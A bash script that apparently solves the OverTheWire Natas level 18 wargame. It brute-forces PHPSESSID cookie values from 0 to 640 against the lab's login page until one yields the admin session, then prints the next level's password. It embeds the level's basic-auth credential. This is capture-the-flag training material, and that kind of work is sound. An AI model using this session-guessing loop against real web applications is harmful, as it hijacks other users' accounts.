#!/usr/bin/env bash

USERNAME="admin"
PASSWORD="arbitrary"

req() {
  local SESSION_ID=$1
  curl http://natas18.natas.labs.overthewire.org/index.php \
       -X POST \
       -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
       -d "username=$USERNAME" \
       -d "password=$PASSWORD" \
       --cookie "PHPSESSID=$SESSION_ID" \
       -sS \
    | grep "Password: "
}

MIN_ID=0
MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
  printf "Attempt: %2d" $i
  OUT=$(req "$i")
  if [ $? -ne 0 ]; then
    echo -en '\r'
  else
    echo " [admin]"
    echo $OUT | awk '{print substr($2,1,32)}'
    break
  fi
done